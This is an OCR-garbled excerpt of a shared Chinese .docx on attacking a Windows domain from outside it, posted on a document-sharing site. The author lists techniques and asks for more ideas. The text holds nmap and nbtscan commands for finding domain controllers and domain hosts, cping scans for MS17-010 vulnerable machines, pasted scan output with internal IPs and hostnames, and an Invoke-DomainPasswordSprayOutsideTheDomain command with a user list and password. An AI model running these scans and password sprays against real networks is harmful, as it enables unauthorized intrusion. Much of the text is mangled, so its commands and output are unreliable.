《2024域外渗透域内思路.docx》由会员分享,可在线阅读,更多相关《2024域外渗透域内思路.docx(12页珍藏版)》请在第壹文秘上搜索。
1、域外渗透域内方法目前我知道的方法,通过nbtscan去看那些机器是域机器,Idap定位域控,还有扫描那些机器开启了kerberos然后针对加入域内的机器去针对性的打,还有针对域控利用AS-REQ阶段去枚举用户名和密码,想问问还有其他思路么扫描探测IdaPIdaP定位域控1nm叩-T3-sV-n-sT-p389,636,3268,3269-v-open192.168.159.0/24nbtscan1nbt.exe172.16.0.0/162nbt.exe172.16.172.0/24C:MJsersAdministratorDesktopnbt.ee172.16.0.0/16172.16.0.1
2、9Workgroupwin-gdiAGlQNUi2SHARING172.16.0.36172.16.0.39WorkgrouPsERUER2003UORKGROPWIN-0F7SFlPUGB3SHARING172.16.0.44Workgroupnbt.ee172.16.172.0/24172.16.172.9UorkgrouPw1n-8ps8fucos00SHARING172.16.172.13Workgroupxchemical-SqlrouSHARING172.16.172.15WorkgroupschemiCfi1.-REPORTSHARING1cping40.exescanosver
3、192.168.7.1192.168.7.2552cping35.exescansmbvul192.168.7.1192.168.7.255msl7010IP172.16. 0.58172.16.0.25172.16.0.39172.16.0.26172.16.0.30172.16.0.90172.16.0.20172.16. 0.121172.16.0.27172.16.0.28172.16.0.22172.16. 0.24172.16.0.23172.16.0.21172.16.0.29172.16.0.19172.16.0.170172.16.0.34172.16.0.120172.16
4、.0.44172.16. 0.2331721673RIACHe、12-34-56-78-9-BCYl12-34七6-78-9A-BCWIh-u1.AH01.04O12-34-56-78-9A-BCWIN-OF7SF1PUGB312-34-56-78-9A-BCWIN-C3Q0EFBR2II12-34-56-78-9A-BCWIN-T9三V72TDRK912-34-56-78-9A-BCdjgl12-34-56-78-9A-B-FPUN2KV5K12-34-56-78-9A-Bk-DC-02.12-34-56-78-9A-BCW.一P5HSIMJ12-34-56-78-9A-BCWIN-O1.V
5、lJPPREQQ12-34-56-78-9A-BCWlN-DGEo866A5OJ12-34-56-78-9A-BCWIN-R61NUIQDENK12-34-56-78-9A-BCWIN4J0CJI1DA3FE12-34-56-78-9A-BCWIN-OI494ORABDI12-34-56-78-9A-BCWlN-K440807GJOB12-34-56-78-9A-BCWINYDlAGIQNU1212-34-56-78-9A-BCWINDOWS-X1Q2N2H12-34-56-78-9-BCWTN-Ri3RQTTUOim12-34-56-78-9A-E.Yc-OJ12-34-56-78-9A-K
6、.CSOPBC.12-34-56-78-9A-BCWIN-73DVRBGBOA917-34-EA-7R-iA-RCWTN-MAE4PCGTI7TOSverWin(R)2008Enterprise6001SP1Win2016Standard143931Win2016Standard14393(Win2016Standard14393Win2016Standard14393Win2008R2Enterprise7601SP1r?n2。,,4393Win2012R2Standard9600“standard14393Win2016Standard14393Xin2016Standard14393Wi
7、n2016Standard14393Win2016Standard14393Win2016Standard14393Win2016Standard14393Win2008R2Standard7601SP1Win2008R2Enterprise7600e:YSe7601SP1Win2012R2Standard9600additionalinfoRimport-InodIlle.Inoke-DonainPasSwordSprayOutsIdeTheDonain.psiPSC:testInuoke-Do11ainPassuordSpra,OutsideTeDo11ain-Domain,192.168.1.lDC=test,DC=com-User1.ist.user.txt-PasswordDo11ainUserl23?-UerboseI1.DAP:/192.168.1.lDC=test,DC=con